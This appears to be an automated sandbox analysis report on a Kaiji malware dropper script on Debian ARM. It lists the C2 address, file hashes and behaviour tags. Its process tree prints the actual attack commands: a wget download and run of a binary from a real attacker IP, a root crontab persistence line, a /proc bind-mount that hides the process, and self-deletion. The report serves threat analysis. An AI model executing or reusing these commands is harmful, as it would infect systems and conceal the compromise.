Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240418-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    16/04/2025, 18:46

General

  • Target

    download.sh

  • Size

    2KB

  • MD5

    544a2f391e2800bac07e883d902bcc75

  • SHA1

    cea67c26c372d03b795bbba678569256385d3b83

  • SHA256

    1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca

  • SHA512

    f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b

Malware Config

Extracted

Family

kaiji

C2

154.40.47.248:888

Signatures

  • Kaiji 1 IoCs

    Kaiji payload

  • Kaiji family
  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 3 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Creates/modifies environment variables 1 TTPs 3 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies init.d 2 TTPs 17 IoCs

    Adds/modifies system service, likely for persistence.

  • Write file to user bin folder 2 IoCs
  • Modifies Bash startup script 2 TTPs 3 IoCs
  • Changes its process name 1 IoCs
  • Command and Scripting Interpreter: Unix Shell 1 TTPs 2 IoCs

    Execute scripts via Unix Shell.

  • Enumerates kernel/hardware configuration 1 TTPs 33 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/download.sh
    /tmp/download.sh
    1⤵
    • Executes dropped EXE
    PID:638
    • /bin/uname
      uname -s
      2⤵
        PID:639
      • /bin/uname
        uname -m
        2⤵
          PID:641
        • /bin/rm
          rm -f linux_arm7
          2⤵
            PID:644
          • /usr/bin/wget
            wget -t 1 http://154.40.47.248:8000/linux_arm7
            2⤵
            • Writes file to tmp directory
            PID:648
          • /bin/chmod
            chmod +x linux_arm7
            2⤵
            • File and Directory Permissions Modification
            PID:714
          • /tmp/linux_arm7
            ./linux_arm7
            2⤵
            • Executes dropped EXE
            • Enumerates kernel/hardware configuration
            PID:715
            • /tmp/linux_arm7
              ./linux_arm7 " "
              3⤵
              • Modifies Watchdog functionality
              • Creates/modifies environment variables
              • Modifies init.d
              • Write file to user bin folder
              • Modifies Bash startup script
              • Changes its process name
              • Enumerates kernel/hardware configuration
              • Reads runtime system information
              PID:720
              • /bin/sh
                /bin/sh -c "/etc/32676&"
                4⤵
                • Executes dropped EXE
                • Command and Scripting Interpreter: Unix Shell
                PID:725
              • /usr/sbin/service
                service crond start
                4⤵
                  PID:728
                  • /usr/bin/basename
                    basename /usr/sbin/service
                    5⤵
                      PID:729
                    • /usr/bin/basename
                      basename /usr/sbin/service
                      5⤵
                        PID:731
                      • /bin/systemctl
                        systemctl --quiet is-active multi-user.target
                        5⤵
                        • Enumerates kernel/hardware configuration
                        • Reads runtime system information
                        PID:732
                      • /bin/sed
                        sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
                        5⤵
                          PID:735
                        • /bin/systemctl
                          systemctl list-unit-files --full "--type=socket"
                          5⤵
                          • Enumerates kernel/hardware configuration
                          PID:734
                        • /bin/systemctl
                          systemctl -p Triggers show dbus.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:736
                        • /bin/systemctl
                          systemctl -p Triggers show ssh.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:737
                        • /bin/systemctl
                          systemctl -p Triggers show syslog.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:738
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-fsckd.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:739
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-initctl.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:740
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-journald-audit.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          PID:743
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-journald-dev-log.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:745
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-journald.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:747
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-networkd.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:749
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-rfkill.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:751
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-udevd-control.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:754
                        • /bin/systemctl
                          systemctl -p Triggers show systemd-udevd-kernel.socket
                          5⤵
                          • Enumerates kernel/hardware configuration
                          • Reads runtime system information
                          PID:756
                      • /usr/local/sbin/systemctl
                        systemctl start crond.service
                        4⤵
                          PID:728
                        • /usr/local/bin/systemctl
                          systemctl start crond.service
                          4⤵
                            PID:728
                          • /usr/sbin/systemctl
                            systemctl start crond.service
                            4⤵
                              PID:728
                            • /usr/bin/systemctl
                              systemctl start crond.service
                              4⤵
                                PID:728
                              • /sbin/systemctl
                                systemctl start crond.service
                                4⤵
                                  PID:728
                                • /bin/systemctl
                                  systemctl start crond.service
                                  4⤵
                                  • Enumerates kernel/hardware configuration
                                  • Reads runtime system information
                                  PID:728
                                • /bin/sh
                                  /bin/sh -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"
                                  4⤵
                                  • Creates/modifies Cron job
                                  • Command and Scripting Interpreter: Unix Shell
                                  PID:762
                                • /usr/bin/renice
                                  renice -20 720
                                  4⤵
                                    PID:766
                                  • /bin/mount
                                    mount -o bind /tmp/ /proc/720
                                    4⤵
                                    • Reads runtime system information
                                    PID:768
                                  • /usr/sbin/service
                                    service cron start
                                    4⤵
                                      PID:769
                                      • /usr/bin/basename
                                        basename /usr/sbin/service
                                        5⤵
                                          PID:770
                                        • /usr/bin/basename
                                          basename /usr/sbin/service
                                          5⤵
                                            PID:771
                                          • /bin/systemctl
                                            systemctl --quiet is-active multi-user.target
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:772
                                          • /bin/sed
                                            sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
                                            5⤵
                                            • Reads runtime system information
                                            PID:775
                                          • /bin/systemctl
                                            systemctl list-unit-files --full "--type=socket"
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:774
                                          • /bin/systemctl
                                            systemctl -p Triggers show dbus.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:778
                                          • /bin/systemctl
                                            systemctl -p Triggers show ssh.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:779
                                          • /bin/systemctl
                                            systemctl -p Triggers show syslog.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:780
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-fsckd.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:781
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-initctl.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:782
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-journald-audit.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            PID:784
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-journald-dev-log.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:785
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-journald.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:786
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-networkd.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:787
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-rfkill.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:789
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-udevd-control.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:790
                                          • /bin/systemctl
                                            systemctl -p Triggers show systemd-udevd-kernel.socket
                                            5⤵
                                            • Enumerates kernel/hardware configuration
                                            • Reads runtime system information
                                            PID:791
                                        • /usr/local/sbin/systemctl
                                          systemctl start cron.service
                                          4⤵
                                            PID:769
                                          • /usr/local/bin/systemctl
                                            systemctl start cron.service
                                            4⤵
                                              PID:769
                                            • /usr/sbin/systemctl
                                              systemctl start cron.service
                                              4⤵
                                                PID:769
                                              • /usr/bin/systemctl
                                                systemctl start cron.service
                                                4⤵
                                                  PID:769
                                                • /sbin/systemctl
                                                  systemctl start cron.service
                                                  4⤵
                                                    PID:769
                                                  • /bin/systemctl
                                                    systemctl start cron.service
                                                    4⤵
                                                    • Enumerates kernel/hardware configuration
                                                    • Reads runtime system information
                                                    PID:769
                                                  • /bin/systemctl
                                                    systemctl start crond.service
                                                    4⤵
                                                    • Enumerates kernel/hardware configuration
                                                    • Reads runtime system information
                                                    PID:792
                                              • /bin/rm
                                                /bin/rm /tmp/download.sh
                                                2⤵
                                                  PID:721
                                              • /etc/32676
                                                /etc/32676
                                                1⤵
                                                  PID:727
                                                  • /bin/sleep
                                                    sleep 60
                                                    2⤵
                                                      PID:730
                                                    • /bin/sleep
                                                      sleep 60
                                                      2⤵
                                                        PID:830
                                                      • /bin/sleep
                                                        sleep 60
                                                        2⤵
                                                          PID:854

                                                      Network

                                                      MITRE ATT&CK Enterprise v16

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • /.mod

                                                        Filesize

                                                        34B

                                                        MD5

                                                        f5a3713282e43c200f30342f5ff5e2ea

                                                        SHA1

                                                        2b2ce1a207e2b691a074c6f78f71c4785aae426a

                                                        SHA256

                                                        6ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511

                                                        SHA512

                                                        5bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013

                                                      • /etc/.walk

                                                        Filesize

                                                        41B

                                                        MD5

                                                        dc6394a4d22242b33f9d43a96ffe3502

                                                        SHA1

                                                        54824f7e446db91a6670d0d552d0ff41d767e9d1

                                                        SHA256

                                                        e922d8377bf3bf26579efe87cdda038e2f10c5e597b2aba7677bc921bd848215

                                                        SHA512

                                                        1ea735fd1abaf67eecadec35a04763a836fe11674d38976ef076883207d1708097e0dd8371e91c30a8fa2c0525da0dc2ba703b30497b279c0206e6ffcb88dd0d

                                                      • /etc/.walk

                                                        Filesize

                                                        90B

                                                        MD5

                                                        6179c060af048542f9426ec07bd2d841

                                                        SHA1

                                                        ab4421ac24e1481d4334862e7ceb979144d3535a

                                                        SHA256

                                                        c742581cef7f919ce2516918c50022ad11da00889fff78bceed7d36f456c1b45

                                                        SHA512

                                                        2ebf226a7c6e8cf252bd216036ea983fb67ba244d9a2bdb5c8d202e80a5a6feeb5d6915def4be9894d0b6acdbb85ad0177a9aac7cb2e819d340b5bb316d2c00f

                                                      • /etc/32676

                                                        Filesize

                                                        56B

                                                        MD5

                                                        585f408444cbca746945f0cb63f2c3f0

                                                        SHA1

                                                        0e44bae17174f04514e770ca7fc4bec1007e39cd

                                                        SHA256

                                                        ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299

                                                        SHA512

                                                        022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596

                                                      • /etc/profile.d/gateway.sh

                                                        Filesize

                                                        911B

                                                        MD5

                                                        522cadedcca724421b27f68657bd69b0

                                                        SHA1

                                                        b42741c0734f3662d0a0c2690b7ef6414bcda4e0

                                                        SHA256

                                                        836cd5eee60bdb3444bc37e4a3a4db97791b55f86f7e416718c909522a93ebe8

                                                        SHA512

                                                        1ce9b1814deb5a51f6945739c66207ba2eea139b567073e4e9c63eeedf37c327f4ac87f8adc0db6eb96a483e2621d13e663e492e2d71191537e807b38e2c9b35

                                                      • /tmp/linux_arm7

                                                        Filesize

                                                        2.0MB

                                                        MD5

                                                        9c069085ca52a2acca2bf52f1171a7da

                                                        SHA1

                                                        5c6a4714a083dcb6a44adb2043705d65a4ec61ad

                                                        SHA256

                                                        1934d283e13ddcbe0c1c85e4d41d7c27a1261b0f0d9302451b042952e2708a3e

                                                        SHA512

                                                        07a87d09d1711c23b95a904d47aa003dfca41fde7af2b3e220bf1dc8f4a4ae4c4ddb2394150652ac50afde4810250418172fdeb7859a664751be5e80354e5034

                                                      • /usr/bin/include/find

                                                        Filesize

                                                        134KB

                                                        MD5

                                                        138a27d6fe52fa1132760a4fa48922e0

                                                        SHA1

                                                        e0250e4d7bf33a5a1064344224148b889cb15138

                                                        SHA256

                                                        81a10dad907b23521461bd3fc83c2cedb2218933a328d9a05e3c9f6a9a1d42aa

                                                        SHA512

                                                        ee0078afad63fc2aaffdebb7127d1c7d4459287fee75358f57c82d397c39b7bf64338fb6996dfb1747cd9a896d714b3c76f0948727be91550f1affa1c0298a9e